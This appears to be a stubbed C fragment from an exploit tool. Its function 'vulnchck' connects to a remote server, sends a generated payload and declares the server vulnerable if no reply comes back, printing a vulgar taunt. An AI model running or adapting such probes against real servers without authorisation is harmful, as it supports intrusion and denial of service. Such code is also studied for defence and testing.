
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct timeval {int tv_sec; scalar_t__ tv_usec; } ;
struct sockaddr_in {int dummy; } ;
typedef int payload ;
typedef int fd_set ;


 int close (int) ;
 int conn (struct sockaddr_in,int) ;
 int exit (int) ;
 int gen_payload (char*,int,int,int ) ;
 int printf (char*) ;
 int recv (int,char*,int,int ) ;
 int sockprintf (int,char*,char*) ;

void vulnchck(struct sockaddr_in addr, int port){
    char payload[1024];
    int sock;
    struct timeval timeout;
    fd_set fds;

    timeout.tv_sec = 3;
    timeout.tv_usec = 0;

    printf("[!] Checking if the server is vuln!\n");
    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!\n");
        exit(1);
    }
    gen_payload(payload, sizeof(payload), 0x00, 0);
    sockprintf(sock, "%s\r\n", payload);
    if(recv(sock, payload, sizeof(payload), 0) < 1){
        printf("[+] Yeaahaa server is vuln, lets fuck that bitch!\n");
        close(sock);
        return;
    }
    printf("[-] Server not vuln!\n");
    close(sock);
    exit(1);
}
